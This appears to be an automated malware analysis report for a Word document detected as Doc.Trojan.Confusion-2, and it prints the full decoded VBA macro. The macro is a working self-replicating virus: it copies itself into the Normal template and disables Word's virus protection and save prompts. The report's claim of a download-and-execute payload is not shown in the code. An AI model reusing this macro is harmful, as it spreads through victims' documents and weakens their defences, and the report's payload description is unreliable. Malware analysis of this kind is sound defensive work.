Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d1786e9c408faa46…

MALICIOUS

Office (OLE)

31.0 KB Created: 2000-02-03 07:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9f37c223488a1897a7e539be54c6f585 SHA-1: 11da4ecc7c4cf6128a6af5b557b4dc34b604ee64 SHA-256: d1786e9c408faa469f0be56098c7d8217cde1115cec030bef8cb7a65a9a2fdf0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a secondary payload, as indicated by the ClamAV detection name 'Doc.Trojan.Confusion-2' and the presence of VBA code that manipulates the document and potentially interacts with external resources. The macro's code is heavily obfuscated and truncated, making a precise analysis of its actions difficult, but its intent is clearly malicious.

Heuristics 3

  • ClamAV: Doc.Trojan.Confusion-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Confusion-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2386 bytes
SHA-256: 90d4e78c0b6ac5f2f937edec1672a34a772c87fd4202a5ccbb01ec6b740ef826
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
A1 = System.Country
Set A = ThisDocument
gh = Application.DisplayAlerts
With A
Set dfg = Word.System
Set B = .VBProject
If Application.Documents.Count = 0 Then gfs = Application.Caption
End With
Author = "Lys Kovick"
With B
Application.Visible = True
Set C = .VBComponents
If C1 = Application.Version Then Beep
End With
kgb = afterme
With C
CPU = System.ProcessorType
Set D = .Item(1)
R = U = Confused
End With
ICU = DoUCMe
With D
BSBSBS = Application.Caption
Set E = .CodeModule
OS = System.OperatingSystem
End With
TD = ThisDocument
With E
A1 = System.Country
F = .Lines(1, .CountOfLines)
gh = Application.DisplayAlerts
End With
Set dfg = Word.System
If A = ActiveDocument Then
If Application.Documents.Count = 0 Then gfs = Application.Caption
Set G = NormalTemplate
Author = "Lys Kovick"
Else
Application.Visible = True
Set G = ActiveDocument
If C1 = Application.Version Then Beep
End If
kgb = afterme
With G
CPU = System.ProcessorType
Set H = .VBProject
R = U = Confused
End With
ICU = DoUCMe
With H
BSBSBS = Application.Caption
Set I = .VBComponents
OS = System.OperatingSystem
End With
TD = ThisDocument
With I
A1 = System.Country
Set J = .Item(1)
gh = Application.DisplayAlerts
End With
Set dfg = Word.System
With J
If Application.Documents.Count = 0 Then gfs = Application.Caption
Set K = .CodeModule
Author = "Lys Kovick"
End With
Application.Visible = True
With K
If C1 = Application.Version Then Beep
.DeleteLines 1, .CountOfLines
kgb = afterme
End With
CPU = System.ProcessorType
With K
R = U = Confused
.AddFromString F
ICU = DoUCMe
End With
BSBSBS = Application.Caption
Set L = Options
OS = System.OperatingSystem
With L
TD = ThisDocument
.ConfirmConversions = 0
A1 = System.Country
End With
gh = Application.DisplayAlerts
With L
Set dfg = Word.System
.SaveNormalPrompt = 0
If Application.Documents.Count = 0 Then gfs = Application.Caption
End With
Author = "Lys Kovick"
With L
Application.Visible = True
.VirusProtection = 0
If C1 = Application.Version Then Beep
End With
kgb = afterme
End Sub